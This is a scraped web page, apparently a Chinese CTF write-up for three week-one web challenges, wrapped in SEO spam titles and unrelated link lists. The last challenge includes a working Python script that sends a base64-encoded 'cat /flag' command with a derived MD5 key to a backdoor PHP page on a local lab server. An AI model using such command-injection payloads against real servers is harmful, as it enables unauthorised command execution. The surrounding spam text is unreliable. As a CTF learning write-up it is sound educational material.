当前位置: 首页 > news >正文

鲜花网站建设的总体目标net程序员网站开发工程师

鲜花网站建设的总体目标,net程序员网站开发工程师,工厂招工信息,怎样做月嫂网站文章目录 week1headach3会赢吗智械危机 week1 headach3 根据提示,在页面的请求头里找到flag flag{You_Ar3_R3Ally_A_9ooD_d0ctor} 会赢吗 打开控制台,拿到第一部分flag 将地址栏改为提示,去到下一关 控制台调用函数,得到flag …

文章目录

  • week1
    • headach3
    • 会赢吗
    • 智械危机

week1

headach3

根据提示,在页面的请求头里找到flag
flag{You_Ar3_R3Ally_A_9ooD_d0ctor}

在这里插入图片描述

会赢吗

打开控制台,拿到第一部分flag
在这里插入图片描述
将地址栏改为提示,去到下一关在这里插入图片描述
控制台调用函数,得到flag
在这里插入图片描述
进入第三关,看到与第二关很相似,同样是向一个地方发数据,根据响应拿到flag,但是第二关没有完成该功能的函数,猜测是要自己写一个脚本数据过去
在这里插入图片描述
看题解才发现原来是要修改if指向的条件值在这里插入图片描述
去到第四关,修改设置禁用js,拿到flag,最后将所有flag进行base64解码即可

智械危机

进来看到提示flag跟robots相关,访问robots.txt,(这里为什么要访问这个地址,也是在一次ai的过程里突然理解)得到一个地址,进入在这里插入图片描述
在这里插入图片描述
函数部分的逻辑好理解,接下来解释一下if部分的逻辑在这里插入图片描述
在这里插入图片描述在这里插入图片描述
所以我们所看到的当前网页其实就是else语句执行后的结果
在这里插入图片描述
在题目的源码里,我们可以看到解码后的命令会被执行,因此,可以发送一个获取flag的命令过去,也就是一个webshell

from hashlib import *
from random import  *
from requests import *
from tqdm import *
import uuid
import base64
url='http://127.0.0.1:59206//backd0or.php'
cmd='cat /flag'
base_cmd=base64.b64encode(cmd.encode()).decode()
rev_base_cmd=base_cmd[::-1]
key=base64.b64encode(md5(rev_base_cmd.encode()).hexdigest().encode()).decode()
payload={'cmd':base_cmd,'key':key
}
responce=post(url,data=payload)
print(responce.text)
http://www.yayakq.cn/news/22468/

相关文章:

  • 网站建设费用:做个网站要多少钱?wordpress批量修改标题
  • 淄博周村网站建设方案理财网站方案建设
  • 网站设置文件夹权限小型购物网站建设
  • 做网站的费用 优帮云友情链接是在网站后台做吗
  • 公司网站建设需求seo推广专员
  • 四网合一的网站怎么做seo关键词优化
  • 织梦手机网站源码下载建com网站
  • 东莞网站推广优化建设沈阳建立网站
  • 设计的网站都有哪些功能能看见自己家的地图软件免费
  • 网站建设和管理经验自适应企业网站模板
  • 做网站根据内容生成pdf网站建设合同要上印花税吗
  • 贵阳网站设计zu97网站中的动态统计图如何做
  • 网站icp备案申请app 推广
  • 大连地区建设网站梅州高铁
  • 乐清建设网站公司百度霸屏推广一般多少钱
  • 网站 搜索怎么实现wordpress 新闻资讯
  • 安卓网站开发前景视频素材网站建设
  • 官方网站开发与定制wordpress 下载按钮插件
  • 网站搭建教程吾爱破解做网站比较好的软件
  • 什么网站能看男女做暧试管婴儿网站建设
  • 网页设计与网站建设的热点网站开发视频是存储的
  • 做的好的地方网站hugo 怎么做网站
  • 哪个网站可以做竖屏柳市网
  • 网站表格怎么做的网站用橙色
  • 茶叶网站建设模板在线浏览器网页版入口
  • 邯郸网站建设哪家强vps打开网站很慢
  • 网站建设技术开发网站建设规章制度
  • 网站模板怎么设计页面设计收获心得
  • 四川平台网站建设设计兰州有制作网站
  • 抚顺网站seo网页制作与网站开发用的软件